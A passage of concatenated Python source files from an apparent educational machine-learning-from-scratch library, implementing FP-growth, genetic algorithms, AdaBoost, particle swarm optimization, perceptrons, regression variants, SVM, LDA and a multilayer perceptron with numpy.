item in itemset: if not item in node.children: return False node = node.children[item] return True def _determine_prefixes(self, itemset, node, prefixes=None): """ Recursive method that adds prefixes to the itemset by traversing the FP Growth Tree""" if not prefixes: prefixes = [] # If the current node is a prefix to the itemset # add the current prefixes value as prefix to the itemset if self._is_prefix(itemset, node): itemset_key = self._get_itemset_key(itemset) if not itemset_key in self.prefixes: self.prefixes[itemset_key] = [] self.prefixes[itemset_key] += [{"prefix": prefixes, "support": node.children[itemset[0]].support}] for child_key in node.children: child = node.children[child_key] # Recursive call with child as new node. Add the child item as potential # prefix. self._determine_prefixes(itemset, child, prefixes + [child.item]) def _get_itemset_key(self, itemset): """ Determines the look of the hashmap key for self.prefixes List of more strings than one gets joined by '-' """ if len(itemset) > 1: itemset_key = "-".join(itemset) else: itemset_key = str(itemset[0]) return itemset_key def _determine_frequent_itemsets(self, conditional_database, suffix): # Calculate new frequent items from the conditional database # of suffix frequent_items = self._get_frequent_items(conditional_database) cond_tree = None if suffix: cond_tree = self._construct_tree(conditional_database, frequent_items) # Output new frequent itemset as the suffix added to the frequent # items self.frequent_itemsets += [el + suffix for el in frequent_items] # Find larger frequent itemset by finding prefixes # of the frequent items in the FP Growth Tree for the conditional # database. self.prefixes = {} for itemset in frequent_items: # If no suffix (first run) if not cond_tree: cond_tree = self.tree_root # Determine prefixes to itemset self._determine_prefixes(itemset, cond_tree) conditional_database = [] itemset_key = self._get_itemset_key(itemset) # Build new conditional database if itemset_key in self.prefixes: for el in self.prefixes[itemset_key]: # If support = 4 => add 4 of the corresponding prefix set for _ in range(el["support"]): conditional_database.append(el["prefix"]) # Create new suffix new_suffix = itemset + suffix if suffix else itemset self._determine_frequent_itemsets(conditional_database, suffix=new_suffix) def find_frequent_itemsets(self, transactions, suffix=None, show_tree=False): self.transactions = transactions # Build the FP Growth Tree self.tree_root = self._construct_tree(transactions) if show_tree: print ("FP-Growth Tree:") self.print_tree(self.tree_root) self._determine_frequent_itemsets(transactions, suffix=None) return self.frequent_itemsets File: mlfromscratch/unsupervised_learning/genetic_algorithm.py from __future__ import print_function, division import string import numpy as np class GeneticAlgorithm(): """An implementation of a Genetic Algorithm which will try to produce the user specified target string. Parameters: ----------- target_string: string The string which the GA should try to produce. population_size: int The number of individuals (possible solutions) in the population. mutation_rate: float The rate (or probability) of which the alleles (chars in this case) should be randomly changed. """ def __init__(self, target_string, population_size, mutation_rate): self.target = target_string self.population_size = population_size self.mutation_rate = mutation_rate self.letters = [" "] + list(string.ascii_letters) def _initialize(self): """ Initialize population with random strings """ self.population = [] for _ in range(self.population_size): # Select random letters as new individual individual = "".join(np.random.choice(self.letters, size=len(self.target))) self.population.append(individual) def _calculate_fitness(self): """ Calculates the fitness of each individual in the population """ population_fitness = [] for individual in self.population: # Calculate loss as the alphabetical distance between # the characters in the individual and the target string loss = 0 for i in range(len(individual)): letter_i1 = self.letters.index(individual[i]) letter_i2 = self.letters.index(self.target[i]) loss += abs(letter_i1 - letter_i2) fitness = 1 / (loss + 1e-6) population_fitness.append(fitness) return population_fitness def _mutate(self, individual): """ Randomly change the individual's characters with probability self.mutation_rate """ individual = list(individual) for j in range(len(individual)): # Make change with probability mutation_rate if np.random.random() < self.mutation_rate: individual[j] = np.random.choice(self.letters) # Return mutated individual as string return "".join(individual) def _crossover(self, parent1, parent2): """ Create children from parents by crossover """ # Select random crossover point cross_i = np.random.randint(0, len(parent1)) child1 = parent1[:cross_i] + parent2[cross_i:] child2 = parent2[:cross_i] + parent1[cross_i:] return child1, child2 def run(self, iterations): # Initialize new population self._initialize() for epoch in range(iterations): population_fitness = self._calculate_fitness() fittest_individual = self.population[np.argmax(population_fitness)] highest_fitness = max(population_fitness) # If we have found individual which matches the target => Done if fittest_individual == self.target: break # Set the probability that the individual should be selected as a parent # proportionate to the individual's fitness. parent_probabilities = [fitness / sum(population_fitness) for fitness in population_fitness] # Determine the next generation new_population = [] for i in np.arange(0, self.population_size, 2): # Select two parents randomly according to probabilities parent1, parent2 = np.random.choice(self.population, size=2, p=parent_probabilities, replace=False) # Perform crossover to produce offspring child1, child2 = self._crossover(parent1, parent2) # Save mutated offspring for next generation new_population += [self._mutate(child1), self._mutate(child2)] print ("[%d Closest Candidate: '%s', Fitness: %.2f]" % (epoch, fittest_individual, highest_fitness)) self.population = new_population print ("[%d Answer: '%s']" % (epoch, fittest_individual)) File: mlfromscratch/supervised_learning/adaboost.py from __future__ import division, print_function import numpy as np import math from sklearn import datasets import matplotlib.pyplot as plt import pandas as pd # Import helper functions from mlfromscratch.utils import train_test_split, accuracy_score, Plot # Decision stump used as weak classifier in this impl. of Adaboost class DecisionStump(): def __init__(self): # Determines if sample shall be classified as -1 or 1 given threshold self.polarity = 1 # The index of the feature used to make classification self.feature_index = None # The threshold value that the feature should be measured against self.threshold = None # Value indicative of the classifier's accuracy self.alpha = None class Adaboost(): """Boosting method that uses a number of weak classifiers in ensemble to make a strong classifier. This implementation uses decision stumps, which is a one level Decision Tree. Parameters: ----------- n_clf: int The number of weak classifiers that will be used. """ def __init__(self, n_clf=5): self.n_clf = n_clf def fit(self, X, y): n_samples, n_features = np.shape(X) # Initialize weights to 1/N w = np.full(n_samples, (1 / n_samples)) self.clfs = [] # Iterate through classifiers for _ in range(self.n_clf): clf = DecisionStump() # Minimum error given for using a certain feature value threshold # for predicting sample label min_error = float('inf') # Iterate throught every unique feature value and see what value # makes the best threshold for predicting y for feature_i in range(n_features): feature_values = np.expand_dims(X[:, feature_i], axis=1) unique_values = np.unique(feature_values) # Try every unique feature value as threshold for threshold in unique_values: p = 1 # Set all predictions to '1' initially prediction = np.ones(np.shape(y)) # Label the samples whose values are below threshold as '-1' prediction[X[:, feature_i] < threshold] = -1 # Error = sum of weights of misclassified samples error = sum(w[y != prediction]) # If the error is over 50% we flip the polarity so that samples that # were classified as 0 are classified as 1, and vice versa # E.g error = 0.8 => (1 - error) = 0.2 if error > 0.5: error = 1 - error p = -1 # If this threshold resulted in the smallest error we save the # configuration if error < min_error: clf.polarity = p clf.threshold = threshold clf.feature_index = feature_i min_error = error # Calculate the alpha which is used to update the sample weights, # Alpha is also an approximation of this classifier's proficiency clf.alpha = 0.5 * math.log((1.0 - min_error) / (min_error + 1e-10)) # Set all predictions to '1' initially predictions = np.ones(np.shape(y)) # The indexes where the sample values are below threshold negative_idx = (clf.polarity * X[:, clf.feature_index] < clf.polarity * clf.threshold) # Label those as '-1' predictions[negative_idx] = -1 # Calculate new weights # Missclassified samples gets larger weights and correctly classified samples smaller w *= np.exp(-clf.alpha * y * predictions) # Normalize to one w /= np.sum(w) # Save classifier self.clfs.append(clf) def predict(self, X): n_samples = np.shape(X)[0] y_pred = np.zeros((n_samples, 1)) # For each classifier => label the samples for clf in self.clfs: # Set all predictions to '1' initially predictions = np.ones(np.shape(y_pred)) # The indexes where the sample values are below threshold negative_idx = (clf.polarity * X[:, clf.feature_index] < clf.polarity * clf.threshold) # Label those as '-1' predictions[negative_idx] = -1 # Add predictions weighted by the classifiers alpha # (alpha indicative of classifier's proficiency) y_pred += clf.alpha * predictions # Return sign of prediction sum y_pred = np.sign(y_pred).flatten() return y_pred def main(): data = datasets.load_digits() X = data.data y = data.target digit1 = 1 digit2 = 8 idx = np.append(np.where(y == digit1)[0], np.where(y == digit2)[0]) y = data.target[idx] # Change labels to {-1, 1} y[y == digit1] = -1 y[y == digit2] = 1 X = data.data[idx] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5) # Adaboost classification with 5 weak classifiers clf = Adaboost(n_clf=5) clf.fit(X_train, y_train) y_pred = clf.predict(X_test) accuracy = accuracy_score(y_test, y_pred) print ("Accuracy:", accuracy) # Reduce dimensions to 2d using pca and plot the results Plot().plot_in_2d(X_test, y_pred, title="Adaboost", accuracy=accuracy) if __name__ == "__main__": main() File: mlfromscratch/supervised_learning/particle_swarm_optimization.py from __future__ import print_function, division import numpy as np import copy class ParticleSwarmOptimizedNN(): """ Particle Swarm Optimization of Neural Network. Parameters: ----------- n_individuals: int The number of neural networks that are allowed in the population at a time. model_builder: method A method which returns a user specified NeuralNetwork instance. inertia_weight: float [0,1) cognitive_weight: float [0,1) social_weight: float [0,1) max_velocity: float The maximum allowed value for the velocity. Reference: Neural Network Training Using Particle Swarm Optimization https://visualstudiomagazine.com/articles/2013/12/01/neural-network-training-using-particle-swarm-optimization.aspx """ def __init__(self, population_size, model_builder, inertia_weight=0.8, cognitive_weight=2, social_weight=2, max_velocity=20): self.population_size = population_size self.model_builder = model_builder self.best_individual = None # Parameters used to update velocity self.cognitive_w = cognitive_weight self.inertia_w = inertia_weight self.social_w = social_weight self.min_v = -max_velocity self.max_v = max_velocity def _build_model(self, id): """ Returns a new individual """ model = self.model_builder(n_inputs=self.X.shape[1], n_outputs=self.y.shape[1]) model.id = id model.fitness = 0 model.highest_fitness = 0 model.accuracy = 0 # Set intial best as the current initialization model.best_layers = copy.copy(model.layers) # Set initial velocity to zero model.velocity = [] for layer in model.layers: velocity = {"W": 0, "w0": 0} if hasattr(layer, 'W'): velocity = {"W": np.zeros_like(layer.W), "w0": np.zeros_like(layer.w0)} model.velocity.append(velocity) return model def _initialize_population(self): """ Initialization of the neural networks forming the population""" self.population = [] for i in range(self.population_size): model = self._build_model(id=i) self.population.append(model) def _update_weights(self, individual): """ Calculate the new velocity and update weights for each layer """ # Two random parameters used to update the velocity r1 = np.random.uniform() r2 = np.random.uniform() for i, layer in enumerate(individual.layers): if hasattr(layer, 'W'): # Layer weights velocity first_term_W = self.inertia_w * individual.velocity[i]["W"] second_term_W = self.cognitive_w * r1 * (individual.best_layers[i].W - layer.W) third_term_W = self.social_w * r2 * (self.best_individual.layers[i].W - layer.W) new_velocity = first_term_W + second_term_W + third_term_W individual.velocity[i]["W"] = np.clip(new_velocity, self.min_v, self.max_v) # Bias weight velocity first_term_w0 = self.inertia_w * individual.velocity[i]["w0"] second_term_w0 = self.cognitive_w * r1 * (individual.best_layers[i].w0 - layer.w0) third_term_w0 = self.social_w * r2 * (self.best_individual.layers[i].w0 - layer.w0) new_velocity = first_term_w0 + second_term_w0 + third_term_w0 individual.velocity[i]["w0"] = np.clip(new_velocity, self.min_v, self.max_v) # Update layer weights with velocity individual.layers[i].W += individual.velocity[i]["W"] individual.layers[i].w0 += individual.velocity[i]["w0"] def _calculate_fitness(self, individual): """ Evaluate the individual on the test set to get fitness scores """ loss, acc = individual.test_on_batch(self.X, self.y) individual.fitness = 1 / (loss + 1e-8) individual.accuracy = acc def evolve(self, X, y, n_generations): """ Will evolve the population for n_generations based on dataset X and labels y""" self.X, self.y = X, y self._initialize_population() # The best individual of the population is initialized as population's first ind. self.best_individual = copy.copy(self.population[0]) for epoch in range(n_generations): for individual in self.population: # Calculate new velocity and update the NN weights self._update_weights(individual) # Calculate the fitness of the updated individual self._calculate_fitness(individual) # If the current fitness is higher than the individual's previous highest # => update the individual's best layer setup if individual.fitness > individual.highest_fitness: individual.best_layers = copy.copy(individual.layers) individual.highest_fitness = individual.fitness # If the individual's fitness is higher than the highest recorded fitness for the # whole population => update the best individual if individual.fitness > self.best_individual.fitness: self.best_individual = copy.copy(individual) print ("[%d Best Individual - ID: %d Fitness: %.5f, Accuracy: %.1f%%]" % (epoch, self.best_individual.id, self.best_individual.fitness, 100*float(self.best_individual.accuracy))) return self.best_individual File: mlfromscratch/supervised_learning/perceptron.py from __future__ import print_function, division import math import numpy as np # Import helper functions from mlfromscratch.utils import train_test_split, to_categorical, normalize, accuracy_score from mlfromscratch.deep_learning.activation_functions import Sigmoid, ReLU, SoftPlus, LeakyReLU, TanH, ELU from mlfromscratch.deep_learning.loss_functions import CrossEntropy, SquareLoss from mlfromscratch.utils import Plot from mlfromscratch.utils.misc import bar_widgets import progressbar class Perceptron(): """The Perceptron. One layer neural network classifier. Parameters: ----------- n_iterations: float The number of training iterations the algorithm will tune the weights for. activation_function: class The activation that shall be used for each neuron. Possible choices: Sigmoid, ExpLU, ReLU, LeakyReLU, SoftPlus, TanH loss: class The loss function used to assess the model's performance. Possible choices: SquareLoss, CrossEntropy learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, n_iterations=20000, activation_function=Sigmoid, loss=SquareLoss, learning_rate=0.01): self.n_iterations = n_iterations self.learning_rate = learning_rate self.loss = loss() self.activation_func = activation_function() self.progressbar = progressbar.ProgressBar(widgets=bar_widgets) def fit(self, X, y): n_samples, n_features = np.shape(X) _, n_outputs = np.shape(y) # Initialize weights between [-1/sqrt(N), 1/sqrt(N)] limit = 1 / math.sqrt(n_features) self.W = np.random.uniform(-limit, limit, (n_features, n_outputs)) self.w0 = np.zeros((1, n_outputs)) for i in self.progressbar(range(self.n_iterations)): # Calculate outputs linear_output = X.dot(self.W) + self.w0 y_pred = self.activation_func(linear_output) # Calculate the loss gradient w.r.t the input of the activation function error_gradient = self.loss.gradient(y, y_pred) * self.activation_func.gradient(linear_output) # Calculate the gradient of the loss with respect to each weight grad_wrt_w = X.T.dot(error_gradient) grad_wrt_w0 = np.sum(error_gradient, axis=0, keepdims=True) # Update weights self.W -= self.learning_rate * grad_wrt_w self.w0 -= self.learning_rate * grad_wrt_w0 # Use the trained model to predict labels of X def predict(self, X): y_pred = self.activation_func(X.dot(self.W) + self.w0) return y_pred File: mlfromscratch/supervised_learning/regression.py from __future__ import print_function, division import numpy as np import math from mlfromscratch.utils import normalize, polynomial_features class l1_regularization(): """ Regularization for Lasso Regression """ def __init__(self, alpha): self.alpha = alpha def __call__(self, w): return self.alpha * np.linalg.norm(w) def grad(self, w): return self.alpha * np.sign(w) class l2_regularization(): """ Regularization for Ridge Regression """ def __init__(self, alpha): self.alpha = alpha def __call__(self, w): return self.alpha * 0.5 * w.T.dot(w) def grad(self, w): return self.alpha * w class l1_l2_regularization(): """ Regularization for Elastic Net Regression """ def __init__(self, alpha, l1_ratio=0.5): self.alpha = alpha self.l1_ratio = l1_ratio def __call__(self, w): l1_contr = self.l1_ratio * np.linalg.norm(w) l2_contr = (1 - self.l1_ratio) * 0.5 * w.T.dot(w) return self.alpha * (l1_contr + l2_contr) def grad(self, w): l1_contr = self.l1_ratio * np.sign(w) l2_contr = (1 - self.l1_ratio) * w return self.alpha * (l1_contr + l2_contr) class Regression(object): """ Base regression model. Models the relationship between a scalar dependent variable y and the independent variables X. Parameters: ----------- n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, n_iterations, learning_rate): self.n_iterations = n_iterations self.learning_rate = learning_rate def initialize_weights(self, n_features): """ Initialize weights randomly [-1/N, 1/N] """ limit = 1 / math.sqrt(n_features) self.w = np.random.uniform(-limit, limit, (n_features, )) def fit(self, X, y): # Insert constant ones for bias weights X = np.insert(X, 0, 1, axis=1) self.training_errors = [] self.initialize_weights(n_features=X.shape[1]) # Do gradient descent for n_iterations for i in range(self.n_iterations): y_pred = X.dot(self.w) # Calculate l2 loss mse = np.mean(0.5 * (y - y_pred)**2 + self.regularization(self.w)) self.training_errors.append(mse) # Gradient of l2 loss w.r.t w grad_w = -(y - y_pred).dot(X) + self.regularization.grad(self.w) # Update the weights self.w -= self.learning_rate * grad_w def predict(self, X): # Insert constant ones for bias weights X = np.insert(X, 0, 1, axis=1) y_pred = X.dot(self.w) return y_pred class LinearRegression(Regression): """Linear model. Parameters: ----------- n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. gradient_descent: boolean True or false depending if gradient descent should be used when training. If false then we use batch optimization by least squares. """ def __init__(self, n_iterations=100, learning_rate=0.001, gradient_descent=True): self.gradient_descent = gradient_descent # No regularization self.regularization = lambda x: 0 self.regularization.grad = lambda x: 0 super(LinearRegression, self).__init__(n_iterations=n_iterations, learning_rate=learning_rate) def fit(self, X, y): # If not gradient descent => Least squares approximation of w if not self.gradient_descent: # Insert constant ones for bias weights X = np.insert(X, 0, 1, axis=1) # Calculate weights by least squares (using Moore-Penrose pseudoinverse) U, S, V = np.linalg.svd(X.T.dot(X)) S = np.diag(S) X_sq_reg_inv = V.dot(np.linalg.pinv(S)).dot(U.T) self.w = X_sq_reg_inv.dot(X.T).dot(y) else: super(LinearRegression, self).fit(X, y) class LassoRegression(Regression): """Linear regression model with a regularization factor which does both variable selection and regularization. Model that tries to balance the fit of the model with respect to the training data and the complexity of the model. A large regularization factor with decreases the variance of the model and do para. Parameters: ----------- degree: int The degree of the polynomial that the independent variable X will be transformed to. reg_factor: float The factor that will determine the amount of regularization and feature shrinkage. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, degree, reg_factor, n_iterations=3000, learning_rate=0.01): self.degree = degree self.regularization = l1_regularization(alpha=reg_factor) super(LassoRegression, self).__init__(n_iterations, learning_rate) def fit(self, X, y): X = normalize(polynomial_features(X, degree=self.degree)) super(LassoRegression, self).fit(X, y) def predict(self, X): X = normalize(polynomial_features(X, degree=self.degree)) return super(LassoRegression, self).predict(X) class PolynomialRegression(Regression): """Performs a non-linear transformation of the data before fitting the model and doing predictions which allows for doing non-linear regression. Parameters: ----------- degree: int The degree of the polynomial that the independent variable X will be transformed to. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, degree, n_iterations=3000, learning_rate=0.001): self.degree = degree # No regularization self.regularization = lambda x: 0 self.regularization.grad = lambda x: 0 super(PolynomialRegression, self).__init__(n_iterations=n_iterations, learning_rate=learning_rate) def fit(self, X, y): X = polynomial_features(X, degree=self.degree) super(PolynomialRegression, self).fit(X, y) def predict(self, X): X = polynomial_features(X, degree=self.degree) return super(PolynomialRegression, self).predict(X) class RidgeRegression(Regression): """Also referred to as Tikhonov regularization. Linear regression model with a regularization factor. Model that tries to balance the fit of the model with respect to the training data and the complexity of the model. A large regularization factor with decreases the variance of the model. Parameters: ----------- reg_factor: float The factor that will determine the amount of regularization and feature shrinkage. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, reg_factor, n_iterations=1000, learning_rate=0.001): self.regularization = l2_regularization(alpha=reg_factor) super(RidgeRegression, self).__init__(n_iterations, learning_rate) class PolynomialRidgeRegression(Regression): """Similar to regular ridge regression except that the data is transformed to allow for polynomial regression. Parameters: ----------- degree: int The degree of the polynomial that the independent variable X will be transformed to. reg_factor: float The factor that will determine the amount of regularization and feature shrinkage. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, degree, reg_factor, n_iterations=3000, learning_rate=0.01, gradient_descent=True): self.degree = degree self.regularization = l2_regularization(alpha=reg_factor) super(PolynomialRidgeRegression, self).__init__(n_iterations, learning_rate) def fit(self, X, y): X = normalize(polynomial_features(X, degree=self.degree)) super(PolynomialRidgeRegression, self).fit(X, y) def predict(self, X): X = normalize(polynomial_features(X, degree=self.degree)) return super(PolynomialRidgeRegression, self).predict(X) class ElasticNet(Regression): """ Regression where a combination of l1 and l2 regularization are used. The ratio of their contributions are set with the 'l1_ratio' parameter. Parameters: ----------- degree: int The degree of the polynomial that the independent variable X will be transformed to. reg_factor: float The factor that will determine the amount of regularization and feature shrinkage. l1_ration: float Weighs the contribution of l1 and l2 regularization. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, degree=1, reg_factor=0.05, l1_ratio=0.5, n_iterations=3000, learning_rate=0.01): self.degree = degree self.regularization = l1_l2_regularization(alpha=reg_factor, l1_ratio=l1_ratio) super(ElasticNet, self).__init__(n_iterations, learning_rate) def fit(self, X, y): X = normalize(polynomial_features(X, degree=self.degree)) super(ElasticNet, self).fit(X, y) def predict(self, X): X = normalize(polynomial_features(X, degree=self.degree)) return super(ElasticNet, self).predict(X) File: mlfromscratch/supervised_learning/support_vector_machine.py from __future__ import division, print_function import numpy as np import cvxopt from mlfromscratch.utils import train_test_split, normalize, accuracy_score from mlfromscratch.utils.kernels import * from mlfromscratch.utils import Plot # Hide cvxopt output cvxopt.solvers.options['show_progress'] = False class SupportVectorMachine(object): """The Support Vector Machine classifier. Uses cvxopt to solve the quadratic optimization problem. Parameters: ----------- C: float Penalty term. kernel: function Kernel function. Can be either polynomial, rbf or linear. power: int The degree of the polynomial kernel. Will be ignored by the other kernel functions. gamma: float Used in the rbf kernel function. coef: float Bias term used in the polynomial kernel function. """ def __init__(self, C=1, kernel=rbf_kernel, power=4, gamma=None, coef=4): self.C = C self.kernel = kernel self.power = power self.gamma = gamma self.coef = coef self.lagr_multipliers = None self.support_vectors = None self.support_vector_labels = None self.intercept = None def fit(self, X, y): n_samples, n_features = np.shape(X) # Set gamma to 1/n_features by default if not self.gamma: self.gamma = 1 / n_features # Initialize kernel method with parameters self.kernel = self.kernel( power=self.power, gamma=self.gamma, coef=self.coef) # Calculate kernel matrix kernel_matrix = np.zeros((n_samples, n_samples)) for i in range(n_samples): for j in range(n_samples): kernel_matrix[i, j] = self.kernel(X[i], X[j]) # Define the quadratic optimization problem P = cvxopt.matrix(np.outer(y, y) * kernel_matrix, tc='d') q = cvxopt.matrix(np.ones(n_samples) * -1) A = cvxopt.matrix(y, (1, n_samples), tc='d') b = cvxopt.matrix(0, tc='d') if not self.C: G = cvxopt.matrix(np.identity(n_samples) * -1) h = cvxopt.matrix(np.zeros(n_samples)) else: G_max = np.identity(n_samples) * -1 G_min = np.identity(n_samples) G = cvxopt.matrix(np.vstack((G_max, G_min))) h_max = cvxopt.matrix(np.zeros(n_samples)) h_min = cvxopt.matrix(np.ones(n_samples) * self.C) h = cvxopt.matrix(np.vstack((h_max, h_min))) # Solve the quadratic optimization problem using cvxopt minimization = cvxopt.solvers.qp(P, q, G, h, A, b) # Lagrange multipliers lagr_mult = np.ravel(minimization['x']) # Extract support vectors # Get indexes of non-zero lagr. multipiers idx = lagr_mult > 1e-7 # Get the corresponding lagr. multipliers self.lagr_multipliers = lagr_mult[idx] # Get the samples that will act as support vectors self.support_vectors = X[idx] # Get the corresponding labels self.support_vector_labels = y[idx] # Calculate intercept with first support vector self.intercept = self.support_vector_labels[0] for i in range(len(self.lagr_multipliers)): self.intercept -= self.lagr_multipliers[i] * self.support_vector_labels[ i] * self.kernel(self.support_vectors[i], self.support_vectors[0]) def predict(self, X): y_pred = [] # Iterate through list of samples and make predictions for sample in X: prediction = 0 # Determine the label of the sample by the support vectors for i in range(len(self.lagr_multipliers)): prediction += self.lagr_multipliers[i] * self.support_vector_labels[ i] * self.kernel(self.support_vectors[i], sample) prediction += self.intercept y_pred.append(np.sign(prediction)) return np.array(y_pred) File: mlfromscratch/supervised_learning/linear_discriminant_analysis.py from __future__ import print_function, division import numpy as np from mlfromscratch.utils import calculate_covariance_matrix, normalize, standardize class LDA(): """The Linear Discriminant Analysis classifier, also known as Fisher's linear discriminant. Can besides from classification also be used to reduce the dimensionaly of the dataset. """ def __init__(self): self.w = None def transform(self, X, y): self.fit(X, y) # Project data onto vector X_transform = X.dot(self.w) return X_transform def fit(self, X, y): # Separate data by class X1 = X[y == 0] X2 = X[y == 1] # Calculate the covariance matrices of the two datasets cov1 = calculate_covariance_matrix(X1) cov2 = calculate_covariance_matrix(X2) cov_tot = cov1 + cov2 # Calculate the mean of the two datasets mean1 = X1.mean(0) mean2 = X2.mean(0) mean_diff = np.atleast_1d(mean1 - mean2) # Determine the vector which when X is projected onto it best separates the # data by class. w = (mean1 - mean2) / (cov1 + cov2) self.w = np.linalg.pinv(cov_tot).dot(mean_diff) def predict(self, X): y_pred = [] for sample in X: h = sample.dot(self.w) y = 1 * (h < 0) y_pred.append(y) return y_pred File: mlfromscratch/supervised_learning/multi_class_lda.py from __future__ import print_function, division import matplotlib.pyplot as plt import numpy as np from mlfromscratch.utils import calculate_covariance_matrix, normalize, standardize class MultiClassLDA(): """Enables dimensionality reduction for multiple class distributions. It transforms the features space into a space where the between class scatter is maximized and the within class scatter is minimized. Parameters: ----------- solver: str If 'svd' we use the pseudo-inverse to calculate the inverse of matrices when doing the transformation. """ def __init__(self, solver="svd"): self.solver = solver def _calculate_scatter_matrices(self, X, y): n_features = np.shape(X)[1] labels = np.unique(y) # Within class scatter matrix: # SW = sum{ (X_for_class - mean_of_X_for_class)^2 } # <=> (n_samples_X_for_class - 1) * covar(X_for_class) SW = np.empty((n_features, n_features)) for label in labels: _X = X[y == label] SW += (len(_X) - 1) * calculate_covariance_matrix(_X) # Between class scatter: # SB = sum{ n_samples_for_class * (mean_for_class - total_mean)^2 } total_mean = np.mean(X, axis=0) SB = np.empty((n_features, n_features)) for label in labels: _X = X[y == label] _mean = np.mean(_X, axis=0) SB += len(_X) * (_mean - total_mean).dot((_mean - total_mean).T) return SW, SB def transform(self, X, y, n_components): SW, SB = self._calculate_scatter_matrices(X, y) # Determine SW^-1 * SB by calculating inverse of SW A = np.linalg.inv(SW).dot(SB) # Get eigenvalues and eigenvectors of SW^-1 * SB eigenvalues, eigenvectors = np.linalg.eigh(A) # Sort the eigenvalues and corresponding eigenvectors from largest # to smallest eigenvalue and select the first n_components idx = eigenvalues.argsort()[::-1] eigenvalues = eigenvalues[idx][:n_components] eigenvectors = eigenvectors[:, idx][:, :n_components] # Project the data onto eigenvectors X_transformed = X.dot(eigenvectors) return X_transformed def plot_in_2d(self, X, y, title=None): """ Plot the dataset X and the corresponding labels y in 2D using the LDA transformation.""" X_transformed = self.transform(X, y, n_components=2) x1 = X_transformed[:, 0] x2 = X_transformed[:, 1] plt.scatter(x1, x2, c=y) if title: plt.title(title) plt.show() File: mlfromscratch/supervised_learning/multilayer_perceptron.py from __future__ import print_function, division import numpy as np import math from sklearn import datasets from mlfromscratch.utils import train_test_split, to_categorical, normalize, accuracy_score, Plot from mlfromscratch.deep_learning.activation_functions import Sigmoid, Softmax from mlfromscratch.deep_learning.loss_functions import CrossEntropy class MultilayerPerceptron(): """Multilayer Perceptron classifier. A fully-connected neural network with one hidden layer. Unrolled to display the whole forward and backward pass. Parameters: ----------- n_hidden: int: The number of processing nodes (neurons) in the hidden layer. n_iterations: float The number of training iterations the algorithm will tune the weights for. learning_rate: float The step length that will be used when updating the weights. """ def __init__(self, n_hidden, n_iterations=3000, learning_rate=0.01): self.n_hidden = n_hidden self.n_iterations = n_iterations self.learning_rate = learning_rate self.hidden_activation = Sigmoid() self.output_activation = Softmax() self.loss = CrossEntropy() def _initialize_weights(self, X, y): n_samples, n_features = X.shape _, n_outputs = y.shape # Hidden layer limit = 1 / math.sqrt(n_features) self.W = np.random.uniform(-limit, limit, (n_features, self.n_hidden)) self.w0 = np.zeros((1, self.n_hidden)) # Output layer limit = 1 / math.sqrt(self.n_hidden) self.V = np.random.uniform(-limit, limit, (self.n_hidden, n_outputs)) self.v0 = np.zeros((1, n_outputs)) def fit(self, X, y): self._initialize_weights(X, y) for i in range(self.n_iterations): # .............. # Forward Pass # .............. # HIDDEN LAYER hidden_input = X.dot(self.W) + self.w0 hidden_output = self.hidden_activation(hidden_input) # OUTPUT LAYER output_layer_input = hidden_output.dot(self.V) + self.v0 y_pred = self.output_activation(output_layer_input) # ............... # Backward Pass # ............... # OUTPUT LAYER # Grad. w.r.t input of output layer grad_wrt_out_l_input = self.loss.gradient(y, y_pred) * self.output_activation.gradient(output_layer_input) grad_v = hidden_output.T.dot(grad_wrt_out_l_input) grad_v0 = np.sum(grad_wrt_out_l_input, axis=0, keepdims=True) # HIDDEN LAYER # Grad. w.r.t input of hidden layer grad_wrt_hidden_l_input = grad_wrt_out_l_input.dot(self.V.T) * self.hidden_activation.gradient(hidden_input) grad_w = X.T.dot(grad_wrt_hidden_l_input) grad_w0 = np.sum(grad_wrt_hidden_l_input, axis=0, keepdims=True) # Update weights (by gradient descent) # Move against the gradient to minimize loss self.V -= self.learning_rate * grad_v self.v0 -= self.learning_rate * grad_v0 self.W -= self.learning_rate * grad_w self.w0 -= self.learning_rate * grad_w0 # Use the trained model to predict labels of X def predict(self, X): # Forward pass: hidden_input = X.dot(self.W) + self.w0 hidden_output = self.hidden_activation(hidden_input) output_layer_input = hidden_output.dot(self.V) + self.v0 y_pred = self.output_activation(output_layer_input) return y_pred def main(): data = datasets.load_digits() X = normalize(data.data) y = data.target # Convert the nominal y values to binary y = to_categorical(y) X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, seed=1) # MLP clf = MultilayerPerceptron(n_hidden=16, n_iterations=1000, learning_rate=0.01) clf.fit(X_train, y_train) y_pred = np.argmax(clf.predict(X_test), axis=1) y_test = np.argmax(y_test, axis=1) accuracy = accuracy_score(y_test, y_pred) print ("Accuracy:", accuracy) # Reduce dimension to two using PCA and plot the results Plot().plot_in_2d(X_test, y_pred, title="Multilayer Perceptron", accuracy=accuracy, legend_labels=np.unique(y)) if __name__ == "__main__": main() File: mlfromscratch/supervised_learning/gradient_boosting.py from __future__ import division, print_function import numpy as np import progressbar # Import helper functions from mlfromscratch.utils import train_test_split, standardize, to_categorical from mlfromscratch.utils import mean_squared_error, accuracy_score from mlfromscratch.deep_learning.loss_functions import SquareLoss, CrossEntropy from mlfromscratch.supervised_learning.decision_tree import RegressionTree from mlfromscratch.utils.misc import bar_widgets class GradientBoosting(object): """Super class of GradientBoostingClassifier and GradientBoostinRegressor. Uses a collection of regression trees that trains on predicting the gradient of the loss function. Parameters: ----------- n_estimators: int The number of classification trees that are used. learning_rate: float The step length that will be taken when following the negative gradient during training. min_samples_split: int The minimum number of samples needed to make a split when building a tree. min_impurity: float The minimum impurity required to split the tree further. max_depth: int The maximum depth of a tree. regression: boolean True or false depending on if we're doing regression or classification. """ def __init__(self, n_estimators, learning_rate, min_samples_split, min_impurity, max_depth, regression): self.n_estimators = n_estimators self.learning_rate = learning_rate self.min_samples_split = 